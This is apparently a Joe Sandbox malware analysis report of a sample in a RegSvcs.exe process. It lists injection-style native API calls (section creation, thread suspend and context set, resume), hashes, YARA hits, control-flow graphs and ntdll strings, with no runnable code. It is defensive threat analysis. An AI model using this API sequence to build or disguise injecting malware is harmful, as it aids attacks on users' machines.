                                                                                                                              • String ID: dn@$dn@
                                                                                                                              • API String ID: 1323581903-1706352071
                                                                                                                              • Opcode ID: fb6e65454f31f31e21a458745f26c9e500a48d3f4ca65e249766e07491ab640b
                                                                                                                              • Instruction ID: 83a814acbb685b77b6810d9376fdb748afa93211dbf841ccc177d53d2bace50f
                                                                                                                              • Opcode Fuzzy Hash: fb6e65454f31f31e21a458745f26c9e500a48d3f4ca65e249766e07491ab640b
                                                                                                                              • Instruction Fuzzy Hash: 5C715C71E04248DFCB04CFA9C890AEEBBF2BF49304F18816AE559B7381D638A951CF55
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Control-flow Graph

                                                                                                                              APIs
                                                                                                                              • NtCreateSection.NTDLL(?,00000000,000F001F,?,?,!n@,00000000,?,?,08000000), ref: 0040A901
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1350789547.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: CreateSection
                                                                                                                              • String ID: !n@
                                                                                                                              • API String ID: 2449625523-1265431164
                                                                                                                              • Opcode ID: 6bd4d83ee47ceaa75d52cdd63ca5d5f621e47ad02fb05d4f576345a3f8b75b31
                                                                                                                              • Instruction ID: ce495b3b561869dbc8fc36b938cc52476fbb54aa7ab0238764ec94916651f4e6
                                                                                                                              • Opcode Fuzzy Hash: 6bd4d83ee47ceaa75d52cdd63ca5d5f621e47ad02fb05d4f576345a3f8b75b31
                                                                                                                              • Instruction Fuzzy Hash: 28714DB1E04258DFCB04DFA9C490AEDBBF1BF89304F18806AE859B7341D638A952CF55
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Control-flow Graph

                                                                                                                              APIs
                                                                                                                              • NtCreateFile.NTDLL(?,?,?,?,?,?,00000000,?,?,?,?), ref: 0040AD61
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1350789547.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: CreateFile
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 823142352-0
                                                                                                                              • Opcode ID: 269faf619371c3f58e2e25edb940594807b334e9e7e360ba232f02bfdf2ea9aa
                                                                                                                              • Instruction ID: f14eb1a64331bb52a8e8855b640313b0b1895f6e890bdce768e22456816ce4dd
                                                                                                                              • Opcode Fuzzy Hash: 269faf619371c3f58e2e25edb940594807b334e9e7e360ba232f02bfdf2ea9aa
                                                                                                                              • Instruction Fuzzy Hash: 9E814DB1E04258DFCB04CFA9C490AEDBBF6AF4D304F18816AE449B7341D638A952CF55
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Control-flow Graph

                                                                                                                              APIs
                                                                                                                              • NtReadFile.NTDLL(?,?,?,?,?,?,00000000,?,?), ref: 0040AF89
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1350789547.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: FileRead
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2738559852-0
                                                                                                                              • Opcode ID: 98473d7fb557d2295a68941d0b0f09a85a55da3a770275fd10d5b54c690f7971
                                                                                                                              • Instruction ID: 0beaa5dd09238c7edd4954dbf8eb46c0cde398cd49cc1eb366be55cda25cee35
                                                                                                                              • Opcode Fuzzy Hash: 98473d7fb557d2295a68941d0b0f09a85a55da3a770275fd10d5b54c690f7971
                                                                                                                              • Instruction Fuzzy Hash: 9F713BB1E04258DFCB04CFA9C890AEEBBF5BF4D304F18806AE459B7341D638A952CB55
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Control-flow Graph

                                                                                                                              APIs
                                                                                                                              • NtAllocateVirtualMemory.NTDLL(?,?,?,?,?,?), ref: 0040B80D
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1350789547.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: AllocateMemoryVirtual
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2167126740-0
                                                                                                                              • Opcode ID: 1ac9d6d2b11310dafed3ec32fe3bba0151b125e011b9a49dd9478efdfa4473a6
                                                                                                                              • Instruction ID: fe0ce7db222c1d8eb0fe099feec4cd10b543f912076bb5620a1e9d4cb4753506
                                                                                                                              • Opcode Fuzzy Hash: 1ac9d6d2b11310dafed3ec32fe3bba0151b125e011b9a49dd9478efdfa4473a6
                                                                                                                              • Instruction Fuzzy Hash: 02712B71E04158DFCB04CFA9C590AEDBBF5AF89304F18806AE459B7351D738A942CB98
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Control-flow Graph

                                                                                                                              APIs
                                                                                                                              • NtSetContextThread.NTDLL(?,?), ref: 0040A2BD
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1350789547.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: ContextThread
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1591575202-0
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              APIs
                                                                                                                              • NtDelayExecution.NTDLL(0041A7F1,?,?,?,00000000), ref: 0040B3DE
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1350789547.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: DelayExecution
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1249177460-0
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              APIs
                                                                                                                              • NtResumeThread.NTDLL(00406F05,?,?,?,?), ref: 0040A4CD
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1350789547.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: ResumeThread
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 947044025-0
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              APIs
                                                                                                                              • NtSuspendThread.NTDLL(?,?), ref: 00409E9D
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1350789547.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: SuspendThread
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3178671153-0
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              APIs
                                                                                                                              • NtGetContextThread.NTDLL(?,?), ref: 0040A0AD
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1350789547.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: ContextThread
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1591575202-0
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              APIs
                                                                                                                              • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 004175C5
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1350789547.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Load
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2234796835-0
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              APIs
                                                                                                                              • NtClose.NTDLL(0041A798,?,?,00000000,?,0041A798,?,?,?,?,?,?,?,?,00000000,?), ref: 0042860A
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1350789547.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Close
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3535843008-0
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2994545307-0
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2994545307-0
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2994545307-0
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2994545307-0
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Control-flow Graph

                                                                                                                              control_flow_graph 36 413cab-413caf 37 413cb6 36->37 38 413cf7-413d20 37->38 39 413cb7-413cca 37->39 41 413d22-413d34 38->41 42 413d94-413dd1 call 417553 call 404793 call 423f93 38->42 39->37 40 413ccc-413cd1 39->40 43 413cd3-413cf6 40->43 44 413c99-413caa 40->44 45 413d36-413d46 41->45 54 413df3-413df8 42->54 55 413dd3-413de4 PostThreadMessageW 42->55 43->38 45->45 48 413d48-413d5a 45->48 55->54 56 413de6-413df0 55->56 56->54
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1350789547.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: 2N-F32-85$2N-F32-85
                                                                                                                              • API String ID: 0-2434227226
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Control-flow Graph

                                                                                                                              APIs
                                                                                                                              • PostThreadMessageW.USER32(2N-F32-85,00000111,00000000,00000000), ref: 00413DE0
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1350789547.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: MessagePostThread
                                                                                                                              • String ID: 2N-F32-85$2N-F32-85
                                                                                                                              • API String ID: 1836367815-2434227226
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Control-flow Graph

                                                                                                                              control_flow_graph 72 413d63-413d73 73 413d7c-413dd1 call 42ae93 call 417553 call 404793 call 423f93 72->73 74 413d77 call 42a483 72->74 84 413df3-413df8 73->84 85 413dd3-413de4 PostThreadMessageW 73->85 74->73 85->84 86 413de6-413df0 85->86 86->84
                                                                                                                              APIs
                                                                                                                              • PostThreadMessageW.USER32(2N-F32-85,00000111,00000000,00000000), ref: 00413DE0
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1350789547.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: MessagePostThread
                                                                                                                              • String ID: 2N-F32-85$2N-F32-85
                                                                                                                              • API String ID: 1836367815-2434227226
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Control-flow Graph

                                                                                                                              control_flow_graph 123 4288e3-428927 call 404823 call 4295c3 RtlFreeHeap
                                                                                                                              APIs
                                                                                                                              • RtlFreeHeap.NTDLL(2$A,?,?,?,00000000,2$A,?,00412432,?,?), ref: 00428922
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1350789547.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: FreeHeap
                                                                                                                              • String ID: 2$A
                                                                                                                              • API String ID: 3298025750-681408588
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              APIs
                                                                                                                              • RtlAllocateHeap.NTDLL(00419B70,?,?,00419B70,?,?,?,00419B70,?,00002000), ref: 004288D2
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1350789547.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: AllocateHeap
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1279760036-0
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              APIs
                                                                                                                              • ExitProcess.KERNEL32(?,00000000,?,?,B4CE4B00,?,?,B4CE4B00), ref: 00428967
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1350789547.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: ExitProcess
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 621844428-0
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2994545307-0
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                                                                              • API String ID: 0-2160512332
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Strings
                                                                                                                              • Critical section address, xrefs: 014D5425, 014D54BC, 014D5534
                                                                                                                              • Thread identifier, xrefs: 014D553A
                                                                                                                              • Critical section debug info address, xrefs: 014D541F, 014D552E
                                                                                                                              • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 014D54E2
                                                                                                                              • undeleted critical section in freed memory, xrefs: 014D542B
                                                                                                                              • double initialized or corrupted critical section, xrefs: 014D5508
                                                                                                                              • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 014D54CE
                                                                                                                              • Address of the debug info found in the active list., xrefs: 014D54AE, 014D54FA
                                                                                                                              • 8, xrefs: 014D52E3
                                                                                                                              • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 014D540A, 014D5496, 014D5519
                                                                                                                              • Critical section address., xrefs: 014D5502
                                                                                                                              • Thread is in a state in which it cannot own a critical section, xrefs: 014D5543
                                                                                                                              • Invalid debug info address of this critical section, xrefs: 014D54B6
                                                                                                                              • corrupted critical section, xrefs: 014D54C2
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                                                                              • API String ID: 0-2368682639
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Strings
                                                                                                                              • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 014D2506
                                                                                                                              • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 014D2602
                                                                                                                              • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 014D24C0
                                                                                                                              • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 014D2409
                                                                                                                              • RtlpResolveAssemblyStorageMapEntry, xrefs: 014D261F
                                                                                                                              • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 014D25EB
                                                                                                                              • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 014D2624
                                                                                                                              • @, xrefs: 014D259B
                                                                                                                              • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 014D2412
                                                                                                                              • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 014D2498
                                                                                                                              • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 014D22E4
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                                                                                              • API String ID: 0-4009184096
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimeuserer.exe$services.exe$smss.exe$svchost.exe
                                                                                                                              • API String ID: 0-2515994595
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                                                                              • API String ID: 0-1700792311
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Strings
                                                                                                                              • VerifierFlags, xrefs: 014E8C50
                                                                                                                              • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 014E8A67
                                                                                                                              • HandleTraces, xrefs: 014E8C8F
                                                                                                                              • VerifierDlls, xrefs: 014E8CBD
                                                                                                                              • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 014E8A3D
                                                                                                                              • VerifierDebug, xrefs: 014E8CA5
                                                                                                                              • AVRF: -*- final list of providers -*- , xrefs: 014E8B8F
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                                                                                              • API String ID: 0-3223716464
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                                                                                              • API String ID: 0-1109411897
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                                                                              • API String ID: 0-792281065
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Strings
                                                                                                                              • LdrpInitShimEngine, xrefs: 014B99F4, 014B9A07, 014B9A30
                                                                                                                              • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 014B9A2A
                                                                                                                              • apphelp.dll, xrefs: 01456496
                                                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 014B9A11, 014B9A3A
                                                                                                                              • Getting the shim engine exports failed with status 0x%08lx, xrefs: 014B9A01
                                                                                                                              • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 014B99ED
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                              • API String ID: 0-204845295
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Strings
                                                                                                                              • SXS: %s() passed the empty activation context, xrefs: 014D2165
                                                                                                                              • RtlGetAssemblyStorageRoot, xrefs: 014D2160, 014D219A, 014D21BA
                                                                                                                              • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 014D21BF
                                                                                                                              • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 014D2180
